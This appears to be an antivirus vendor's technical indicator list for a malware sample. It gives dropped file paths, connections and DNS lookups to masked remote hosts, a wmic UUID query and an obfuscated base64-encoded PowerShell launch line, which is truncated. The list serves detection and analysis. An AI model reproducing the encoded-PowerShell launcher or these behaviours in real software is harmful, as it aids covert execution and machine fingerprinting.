Техническая информация
- <SYSTEM32>\wbem\wmic.exe
- %ALLUSERSPROFILE%\netsuser.dll
- %ALLUSERSPROFILE%\usdata.dat
- 'ra#.####ubusercontent.com':443
- 'sk#####nwatcher.rest':443
- 'ra#.####ubusercontent.com':443
- 'sk#####nwatcher.rest':443
- DNS ASK ra#.####ubusercontent.com
- DNS ASK sk#####nwatcher.rest
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQA...
- '<SYSTEM32>\wbem\wmic.exe' csproduct get uuid /value